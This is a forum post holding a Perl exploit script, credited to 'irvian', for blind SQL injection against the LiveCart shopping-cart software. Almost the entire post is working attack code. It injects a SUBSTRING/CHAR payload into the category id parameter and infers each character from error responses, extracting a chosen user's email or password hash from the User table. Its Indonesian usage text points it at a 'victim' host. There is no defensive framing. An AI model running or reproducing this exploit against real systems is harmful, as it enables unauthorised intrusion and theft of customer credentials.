Announcement

Collapse
No announcement yet.

livecart Remote Blind Sql Injection

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • livecart Remote Blind Sql Injection

    #!/usr/bin/perl -w
    use LWP::UserAgent;
    #-----------------------------------------------------------------------------------------------#
    # scripts : livecart Remote Blind Sql Injection #
    # scripts site :
    Code:
     [url]http://www.livecart.com[/url]
    #
    # #
    # Discovered #
    # By : irvian #
    # site :
    Code:
    http://irvian.cn
    #
    # forum :
    Code:
    http://noscan.info/forum
    #
    # email : irvian.info@gmail.com #
    # #
    # Thanks To #
    # friend : str0ke, nyubi, ibnusina, arioo, jipank, ifx, karet, bluespy and all my friend #
    #-----------------------------------------------------------------------------------------------#
    # sample : #
    #
    Code:
    http://demo.livecart.com
    #
    #-----------------------------------------------------------------------------------------------#
    print "\r\n[+]----------------------[+]\r\n";
    print "[+]Blind SQL injection [+]\r\n";
    print "[+]Livecart [+]\r\n";
    print "[+]code by irvian [+]\r\n";
    print "[+]irvian[dot]cn [+]\r\n";
    print "[+]----------------------[+]\n\r";
    if (@ARGV < 3){
    die "
    Cara Mengunakan : perl $0 host option userid

    Keterangan
    host :
    Code:
    http://victim.com
    atau victim.com
    Option : pilih 1 untuk mencari email dan pilih 2 untuk mencari password
    userid : Limit
    Contoh : perl $0
    Code:
    http://victim.com
    1 1
    \n";}


    $url = $ARGV[0];
    $option = $ARGV[1];
    $id = $ARGV[2];

    if ($option eq 1){
    syswrite(STDOUT, "email: ", 7);}
    elsif ($option eq 2){
    syswrite(STDOUT, "password: ", 10);}

    for($i = 1; $i <= 32; $i++){
    $f = 0;
    $n = 32;
    while(!$f && $n <= 57)
    {
    if(&blind($url, $option, $id, $i, $n, $id)){
    $f = 1;
    syswrite(STDOUT, chr($n), 1);
    }
    $n++;
    }
    if ($f==0){
    $n = 97;
    while(!$f && $n <= 122)
    {
    if(&blind($url, $option, $id, $i, $n, $id)){
    $f = 1;
    syswrite(STDOUT, chr($n), 1);
    }
    $n++;
    }
    }
    }

    print "\n[+]finish Execution Exploit\n";



    sub blind {
    my $site = $_[0];
    my $op = $_[1];
    my $id = $_[2];
    my $i = $_[3];
    my $n = $_[4];
    my $r = $_[5];
    if ($op eq 1){$klm = "email";}
    elsif ($op eq 2){$klm = "password";}
    $site =~ s/^http:\/\///;
    my $url = "http://"."$site"."/category?id=1"."%20AND%20SUBSTRING((SELECT%20"."$k lm"."%20FROM%20"."User"."%20LIMIT%20"."$r".",1".") ,"."$i".",1)=CHAR("."$n".")";
    my $browser = &zero($url);

    if ($browser !~ /Error Code 500/gi){
    return 1;
    }
    else {
    return 0;
    }
    }

    sub zero($){
    my $spy = $_[0];
    my $ua = LWP::UserAgent->new;
    $ua->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    my $res = $ua->get($spy);
    my @r = $res->content;
    $page="@r";
    return $page;}
Working...
X